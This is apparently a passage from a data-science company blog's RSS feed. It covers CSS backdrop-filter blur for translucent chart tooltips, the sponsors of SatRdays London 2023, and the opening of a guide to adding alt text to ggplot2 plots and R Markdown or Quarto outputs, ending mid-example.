&lt;p&gt;Returning to our Sankey diagram, by adding a tooltip relating to the item being hovered over we can see precise information relating to that item - &lt;a href="https://www.cs.umd.edu/~ben/papers/Shneiderman1996eyes.pdf" rel="external"&gt;&amp;ldquo;details on demand&amp;rdquo;&lt;/a&gt;.&lt;/p&gt;
&lt;figure id="opaque-tooltip" aria-label="A large, opaque, tooltip occludes the data beneath it"&gt;
&lt;img src="assets/background.jpg" srcset="assets/background@2x.jpg 2x" aria-hidden="true" /&gt;
&lt;img class="tooltip" src="assets/tooltip.png" srcset="assets/tooltip@2x.png 2x" aria-hidden="true" /&gt;
&lt;/figure&gt;
&lt;h2 id="the-problem-with-tooltips"&gt;The problem with tooltips&lt;/h2&gt;
&lt;p&gt;There&amp;rsquo;s a problem. And that problem is the same as the advantage given before: the tooltip is placed right where you happen to be looking. This is bad because there&amp;rsquo;s a reasonable chance some useful information has just been occluded. If we compare the two images above we can see that, in the latter case, the &amp;ldquo;Good&amp;rdquo; node has been completely hidden while the vertical extents of the &amp;ldquo;Very Good&amp;rdquo; and &amp;ldquo;Fair&amp;rdquo; nodes are also no longer obvious. With a tooltip that follows the cursor, the user can move around a bit, but it&amp;rsquo;s not ideal, especially with the thinner links.&lt;/p&gt;
&lt;p&gt;One obvious option is to make the background translucent. With an HTML tooltip we can do that by setting its CSS &lt;code&gt;background-color&lt;/code&gt; property to a colour with an alpha channel value less than one. Let&amp;rsquo;s try &lt;code&gt;rgba(255, 255, 255, 0.3)&lt;/code&gt;:&lt;/p&gt;
&lt;figure id="translucent-tooltip" aria-label="A large, translucent tooltip does not occlude the data beneath it but text of the tooltip that overlaps text from the background is difficult to read"&gt;
&lt;img src="assets/background.jpg" srcset="assets/background@2x.jpg 2x" aria-hidden="true" /&gt;
&lt;img class="tooltip" src="assets/tooltip.png" srcset="assets/tooltip@2x.png 2x" aria-hidden="true" /&gt;
&lt;/figure&gt;
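&lt;p&gt;As a rough sketch, and assuming the tooltip element has an HTML class of &lt;code&gt;&amp;quot;tooltip&amp;quot;&lt;/code&gt; (an illustrative selector; any selector that matches your tooltip will do), the rule behind this version could look like this:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-CSS" data-lang="CSS"&gt;.tooltip {
  /* White with an alpha of 0.3: the diagram behind the tooltip shows through */
  background-color: rgba(255, 255, 255, 0.3);
}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;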
&lt;p&gt;This does a pretty good job of fixing the occlusion problem but now the text on the diagram interferes with the text of the tooltip, making them both hard to read where they overlap. One could conceivably hide the Sankey text when the tooltip is visible, but that is likely to lead to an annoying flashing behaviour as that text comes and goes with cursor movement.&lt;/p&gt;
&lt;h2 id="combatting-occlusion-without-introducing-intereference"&gt;Combatting occlusion without introducing interference&lt;/h2&gt;
&lt;p&gt;Now, chances are you&amp;rsquo;ve sat through a few video conferences over the last few years. If you have, there&amp;rsquo;s a high chance you&amp;rsquo;ve seen the use of blurring background filters - the application detects what, in the video feed, is the human and what is the background and blurs the latter. The viewer of the feed then sees the human clearly while the background is much less clear. There&amp;rsquo;s still a general feeling for what&amp;rsquo;s there but not the details. You might be able to make out that there&amp;rsquo;s a bookshelf with books and trinkets but not the titles of the books or the precise nature of the trinkets.&lt;/p&gt;
&lt;p&gt;This got me wondering whether I could do something similar for tooltips. I already knew there was a CSS &lt;code&gt;filter&lt;/code&gt; property with a &lt;code&gt;blur()&lt;/code&gt; function so I thought I&amp;rsquo;d try that:&lt;/p&gt;
&lt;figure id="all-blur-tooltip" aria-label="The whole tooltip is blurred, making it unreadable"&gt;
&lt;img src="assets/background.jpg" srcset="assets/background@2x.jpg 2x" aria-hidden="true" /&gt;
&lt;img class="tooltip" src="assets/tooltip.png" srcset="assets/tooltip@2x.png 2x" aria-hidden="true" /&gt;
&lt;/figure&gt;
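&lt;p&gt;For reference, the rule behind this attempt would have looked something like the sketch below. It assumes the tooltip has an HTML class of &lt;code&gt;&amp;quot;tooltip&amp;quot;&lt;/code&gt; and keeps the translucent background from before; the two-pixel blur radius is an illustrative value rather than the one used in the project.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-CSS" data-lang="CSS"&gt;.tooltip {
  /* Translucent white background, so the diagram shows through */
  background-color: rgba(255, 255, 255, 0.3);
  /* filter acts on the element's own rendering, so the tooltip text and
     any child elements are blurred along with its background */
  filter: blur(2px);
}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;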
&lt;p&gt;Oops. That did not improve readability at all. Obviously I don&amp;rsquo;t want to blur the text in the tooltip. So my next thought was to make the text container transparent then place a separate, translucent, background element directly behind it and apply the blur filter to that. Thankfully I didn&amp;rsquo;t have to go to that faff as I discovered there also exists a &lt;code&gt;backdrop-filter&lt;/code&gt; property. The interactive graphic below shows it in action, with the updating CSS below showing what might be used with a tooltip that has an HTML class of &lt;code&gt;&amp;quot;tooltip&amp;quot;&lt;/code&gt;. (Note that in this example the blur is measured in pixels and the image size varies with screen width, so the optimal blur size here may vary for you depending on the dimensions of your browser window.)&lt;/p&gt;
&lt;div id="interactive-container"&gt;
&lt;figure aria-label="Interactive graphic where the controls can be used to change the opacity and blur size of the tooltip background"&gt;
&lt;img src="assets/background.jpg" srcset="assets/background@2x.jpg 2x" aria-hidden="true" /&gt;
&lt;img class="tooltip" src="assets/tooltip.png" srcset="assets/tooltip@2x.png 2x" aria-hidden="true" /&gt;
&lt;/figure&gt;
&lt;div id="controls"&gt;
&lt;label&gt;Opacity: &lt;input id="opacity-control" type="number" min="0" max="1" step="0.1" value="0.3"/&gt;&lt;/label&gt;
&lt;label&gt;Blur: &lt;input id="blur-control" type="number" min="0" max="20" value="2"/&gt;px&lt;/label&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-CSS" data-lang="CSS"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .&lt;span style="color:#f0883e;font-weight:bold"&gt;tooltip&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;background-color&lt;/span&gt;: rgba(&lt;span style="color:#a5d6ff"&gt;255&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;255&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;255&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0.3&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; backdrop-filter: blur(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This does exactly what I want: The text of the tooltip is completely readable (for me at least, more on that in the Q &amp;amp; A section below). The &amp;ldquo;Good&amp;rdquo; node is still visible as a distinct entity from the &amp;ldquo;Fair&amp;rdquo; and &amp;ldquo;Very Good&amp;rdquo; nodes. Ok, I can&amp;rsquo;t read the label any more, but I at least know there is something of interest there.&lt;/p&gt;
&lt;p&gt;What is actually happening? The CSS &lt;code&gt;blur&lt;/code&gt; function applies a Gaussian blur to the target element&amp;rsquo;s background with the standard deviation specified as the argument (e.g. two pixels). Large areas of flat colour are only really affected at the edges - in entirely non-scientific terms I like to think of it as some of the colour from one pixel being smudged into neighbouring and nearby pixels while the nearby pixels smudge the same colour back into the original pixel for no net effect. Text is basically all edges and so is completely smudged - black text on a white background becoming a grey &amp;ldquo;blob&amp;rdquo;.&lt;/p&gt;
&lt;p&gt;A more scientific explanation would probably include talk of &lt;a href="https://mathworld.wolfram.com/FourierTransform.html" rel="external"&gt;Fourier transforms&lt;/a&gt;, the &lt;a href="https://en.wikipedia.org/wiki/Frequency_domain" rel="external"&gt;frequency domain&lt;/a&gt; and &lt;a href="https://en.wikipedia.org/wiki/Low-pass_filter" rel="external"&gt;low-pass filters&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="q-and-a"&gt;Q and A&lt;/h2&gt;
&lt;h3 id="does-this-work-on-all-browsers"&gt;Does this work on all browsers?&lt;/h3&gt;
&lt;p&gt;The &lt;code&gt;backdrop-filter&lt;/code&gt; property &lt;a href="https://caniuse.com/css-backdrop-filter" rel="external"&gt;does not work on Safari&lt;/a&gt; at the time of writing; it&amp;rsquo;s simply ignored. However, there is a vendor-prefixed version - &lt;code&gt;-webkit-backdrop-filter&lt;/code&gt; - that does work. So a little update to the CSS code (that I already sneaked in behind the scenes to the example above) can make this work across all modern browsers (as far as I&amp;rsquo;m aware):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-CSS" data-lang="CSS"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;.&lt;span style="color:#f0883e;font-weight:bold"&gt;tooltip&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;background-color&lt;/span&gt;: rgba(&lt;span style="color:#a5d6ff"&gt;255&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;255&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;255&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0.3&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;-webkit-&lt;/span&gt;backdrop-filter: blur(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; backdrop-filter: blur(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="what-about-accessibility"&gt;What about accessibility?&lt;/h3&gt;
&lt;p&gt;While we like to &lt;a href="https://www.jumpingrivers.com/tags/accessibility/"&gt;cover accessibility issues in our blog posts&lt;/a&gt;, a thorough treatment of tooltip accessibility is beyond the scope of this post. However, it &lt;em&gt;is&lt;/em&gt; worth mentioning that some people may struggle with the reduced contrast that can come with a translucent tooltip background. So it might be worth considering offering users an override to make the background opaque. Alternatively, your CSS code can check if your user has informed their operating system or browser that they prefer increased contrast. When they do, you then override the applied styles:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-CSS" data-lang="CSS"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;.&lt;span style="color:#f0883e;font-weight:bold"&gt;tooltip&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;background-color&lt;/span&gt;: rgba(&lt;span style="color:#a5d6ff"&gt;255&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;255&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;255&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0.3&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;-webkit-&lt;/span&gt;backdrop-filter: blur(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; backdrop-filter: blur(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;@&lt;span style="color:#ff7b72"&gt;media&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;(&lt;/span&gt;&lt;span style="color:#7ee787"&gt;prefers-contrast&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#7ee787"&gt;more&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;)&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .&lt;span style="color:#f0883e;font-weight:bold"&gt;tooltip&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;background-color&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;white&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;-webkit-&lt;/span&gt;backdrop-filter: &lt;span style="color:#79c0ff"&gt;none&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; backdrop-filter: &lt;span style="color:#79c0ff"&gt;none&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="will-this-solve-all-my-tooltip-occlusion-issues"&gt;Will this solve all my tooltip occlusion issues?&lt;/h3&gt;
&lt;p&gt;Probably not. It works here because the encodings I want to keep visible are large blocks of colour and those I want &amp;ldquo;obscured&amp;rdquo; are smaller. Because of this, I&amp;rsquo;m guessing this design style might work effectively with some thematic maps. On the other hand, where the data is encoded using small elements (e.g. a scatter plot with lots of small points of varying colour) the result might not be ideal.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/optimising-tooltip-design-modern-css/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>SatRdays London 2023: Sponsors</title><link>https://www.jumpingrivers.com/blog/satrdays-london-sponsors/</link><pubDate>Tue, 28 Mar 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/satrdays-london-sponsors/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london-sponsors/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/satrdays-london-sponsors/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;a href="https://satrday-london-2023.jumpingrivers.com/" rel="external"&gt;SatRdays London 2023 is fast approaching!&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="dont-miss-out-ticket-sales-close-at-midnight-on-8th-april"&gt;Don&amp;rsquo;t miss out! Ticket sales close at midnight on 8th April!&lt;/h3&gt;
&lt;p&gt;On 22nd April 2023 we will be hosting SatRdays London, an inclusive, low-cost event, which gives R users an opportunity to network and learn from other experts across sectors. In a &lt;a href="https://www.jumpingrivers.com/blog/satrdays-london-speakers/" rel="external"&gt;recent blog post&lt;/a&gt;, we introduced all of the speakers for the event! This week, it&amp;rsquo;s the sponsors&amp;rsquo; turn.&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-satrdays-sponsors"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;/p&gt;
&lt;h3 id="cusp-london"&gt;CUSP London&lt;/h3&gt;
&lt;p&gt;The &lt;a href="https://cusplondon.ac.uk/" rel="external"&gt;Centre for Urban Science and Progress (CUSP)&lt;/a&gt; are based in London, UK. Their mission is to support interdisciplinary research and innovation using Data Science in and for London, bringing together multi-disciplinary teams of academics, a group of associates from external partners and students working with CUSP.&lt;/p&gt;
&lt;p&gt;CUSP London, hosted in the King’s Department of Informatics, is part of an international network of multidisciplinary institutes led by CUSP New York at the NYU Tandon School of Engineering. They welcome new academic collaborators and external partners into the CUSP family locally and internationally.&lt;/p&gt;
&lt;p&gt;CUSP are generously providing the venue for SatRdays London 2023.&lt;/p&gt;
&lt;h3 id="jumping-rivers"&gt;Jumping Rivers&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt; is an analytics company based in the North East who specialise in creating bespoke solutions for modern business problems. Their team is made up of experts in data science and data engineering from many different backgrounds, and their wealth of knowledge and experience allows them to think outside the box and solve problems in new and innovative ways.&lt;/p&gt;
&lt;h3 id="posit"&gt;Posit&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt; (formerly RStudio), are a US based company who develop R and Python-based tools to help you produce higher quality analysis faster. As well as creating open-source tools for all to use and develop, Posit are very active in the data science community, hosting &lt;a href="https://posit.co/conference/" rel="external"&gt;their own annual conference&lt;/a&gt;, as well as supporting conferences around the world, including SatRdays London!&lt;/p&gt;
&lt;h3 id="r-consortium"&gt;R Consortium&lt;/h3&gt;
&lt;p&gt;The central mission of the &lt;a href="https://www.r-consortium.org/" rel="external"&gt;R Consortium&lt;/a&gt; is to work with and provide support to the R Foundation and to the key organisations developing, maintaining, distributing and using R software through the identification, development and implementation of infrastructure projects. Its members include leading institutions and companies dedicated to the use, development and growth of R.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london-sponsors/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Alt Text in R: Plots, Reports, and Shiny</title><link>https://www.jumpingrivers.com/blog/accessibility-alt-text-in-r/</link><pubDate>Thu, 23 Mar 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/accessibility-alt-text-in-r/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/accessibility-alt-text-in-r/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/accessibility-alt-text-in-r/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h3 id="what-is-alt-text"&gt;What is alt text?&lt;/h3&gt;
&lt;p&gt;Alt text (short for &lt;em&gt;alternative text&lt;/em&gt;) is text that describes the appearance and purpose of an image. Alt text has multiple purposes, the main one being that it helps visually impaired users to understand your content when the alt text is read aloud by screen readers. Alt text is also displayed in place of an image that fails to load, which means that users with a poor internet connection are more likely to be able to engage with your content.&lt;/p&gt;
&lt;h3 id="how-do-i-write-alt-text"&gt;How do I write alt text?&lt;/h3&gt;
&lt;p&gt;There are already a lot of good resources on how to write alt text, and so that&amp;rsquo;s not the main focus of this blog post. This &lt;a href="https://medium.com/nightingale/writing-alt-text-for-data-visualization-2a218ef43f81" rel="external"&gt;Medium&lt;/a&gt; article by Amy Cesal describes a simple formula for helping you to write alt text for charts, which I&amp;rsquo;ve found really helpful. Liz Hare also recently gave a talk on alt text for R-Ladies New York, and the &lt;a href="https://lizharedogs.github.io/RLadiesNYAltText/#1" rel="external"&gt;slides&lt;/a&gt; are an excellent resource.&lt;/p&gt;
&lt;h3 id="can-i-automate-writing-alt-text"&gt;Can I automate writing alt text?&lt;/h3&gt;
&lt;p&gt;One of the often-cited arguments for using programming languages, such as R, is that they allow you to automate processes. And so you may very well be wondering &lt;em&gt;&amp;ldquo;can I use R to automate the writing of alt text?&amp;rdquo;&lt;/em&gt; Before I answer that question, let me remind you of the phrase &lt;em&gt;just because you can, doesn&amp;rsquo;t mean you should&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;The examples of automated alt text to describe plots that I&amp;rsquo;ve seen tend to describe which variables are on the x and y axes, the range of the data, the chart title, and maybe the colours in the plot. Some make attempts to describe a trend line. What&amp;rsquo;s almost always missing is the &amp;ldquo;why&amp;rdquo;. It&amp;rsquo;s very difficult to automate a description of what you&amp;rsquo;re trying to communicate to the person interpreting a plot with only a list of plot components.&lt;/p&gt;
&lt;p&gt;One R package that may be useful as a starting point for writing alt text is the &lt;a href="https://github.com/ajrgodfrey/BrailleR" rel="external"&gt;{BrailleR}&lt;/a&gt; package. It has support for generating alt text for both base R and {ggplot2} graphics, using the &lt;code&gt;VI()&lt;/code&gt; function. Since it&amp;rsquo;s still missing the &amp;ldquo;what am I supposed to be seeing&amp;rdquo; message, and it doesn&amp;rsquo;t always get it right, I&amp;rsquo;d encourage you never to rely 100% on automated alt text. It could provide a starting point for you to check, edit, and include the take-home message of your graphics.&lt;/p&gt;
&lt;p&gt;After you&amp;rsquo;ve written the alt text for your image, you need to actually add it to your document or app. If you&amp;rsquo;re directly writing HTML code, it&amp;rsquo;s usually quite straightforward - and &lt;a href="https://accessibility.psu.edu/images/imageshtml/" rel="external"&gt;this guide&lt;/a&gt; for improving accessibility with alt text gives a great overview. Today, this blog post will show you how to include alt text in your web applications and documents when you&amp;rsquo;ve built them in R.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-alt-text-in-r"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="how-do-i-add-alt-text-in-r"&gt;How do I add alt text in R?&lt;/h3&gt;
&lt;p&gt;With R, you can create static plots, documents, presentations, web applications, and many other output types - and they all need alt text! We&amp;rsquo;ll go through how you do that for the most common output types in R.&lt;/p&gt;
&lt;h4 id="ggplot2"&gt;{ggplot2}&lt;/h4&gt;
&lt;p&gt;It goes without saying that {ggplot2} is one of the most popular packages for creating plots in R. So it&amp;rsquo;s likely that you&amp;rsquo;ll be adding alt text to a plot created with {ggplot2}. Within the &lt;code&gt;labs()&lt;/code&gt; function in {ggplot2}, there&amp;rsquo;s an argument &lt;code&gt;alt&lt;/code&gt; (introduced in version 3.3.4) - and this is where you can add alt text.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(lemurs, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; name, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; n)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_col&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Number of lemurs&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Lemurs at Duke Lemur Center&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; alt &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;A bar chart titled Lemurs at Duke Lemur Center. On the x-axis three species of lemurs are shown including the Crowned lemur, Gray mouse lemur, and Ring-tailed lemur. On the y-axis the count of the number of each species is shown. The number of lemurs ranges from just under 2500 for Crowned lemurs, to almost 12500 for Gray mouse lemurs. The number of Crowned lemurs is significantly lower than the other two species shown.&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="lemurs.png" style="width: 80%; display: block; margin-left: auto; margin-right: auto" alt="A bar chart titled Lemurs at Duke Lemur Center. On the x-axis three species of lemurs are shown including the Crowned lemur, Gray mouse lemur, and Ring-tailed lemur. On the y-axis the count of the number of each species is shown. The number of lemurs ranges from just under 2500 for Crowned lemurs, to almost 12500 for Gray mouse lemurs. The number of Crowned lemurs is significantly lower than the other two species shown." /&gt;
&lt;p&gt;If you save the plot as a variable, you can extract the alt text with:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_alt_text&lt;/span&gt;(g)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;There are a couple of reasons for using the &lt;code&gt;alt&lt;/code&gt; argument in {ggplot2}:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;It&amp;rsquo;s usually easier to write the alt text when you&amp;rsquo;re making the plot, rather than when you&amp;rsquo;re compiling the outputs since it&amp;rsquo;s fresher in your mind.&lt;/li&gt;
&lt;li&gt;The string passed to &lt;code&gt;alt&lt;/code&gt; automatically gets passed as the image&amp;rsquo;s alt text if you use the plot in a Shiny app (more on that later&amp;hellip;)&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="quarto-and-r-markdown"&gt;Quarto and R Markdown&lt;/h4&gt;
&lt;p&gt;Both R Markdown and &lt;a href="https://quarto.org/" rel="external"&gt;Quarto&lt;/a&gt; (next generation R Markdown) allow you to create outputs in HTML format, such as documents or presentations. Although MS Word and Adobe are starting to allow you to add alt text to Word documents and PDFs, neither R Markdown nor Quarto has support for this yet (although hopefully they will in the future). HTML outputs are more accessible in general, so I&amp;rsquo;d recommend HTML outputs where possible anyway.&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;re creating a plot within a code chunk, you can use the &lt;code&gt;fig.alt&lt;/code&gt; option in R Markdown to pass in a character string of alt text:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-md" data-lang="md"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;``&lt;span style="color:#a5d6ff"&gt;`{r, fig.alt=&amp;#34;A bar chart titled Lemurs at Duke Lemur Center. On the x-axis three species of lemurs are shown including the Crowned lemur, Gray mouse lemur, and Ring-tailed lemur. On the y-axis the count of the number of each species is shown. The number of lemurs ranges from just under 2500 for Crowned lemurs, to almost 12500 for Gray mouse lemurs. The number of Crowned lemurs is significantly lower than the other two species shown.&amp;#34;}
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;g
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;`&lt;/span&gt;``
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and in Quarto, the idea is similar but the syntax is slightly different:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;```{r}
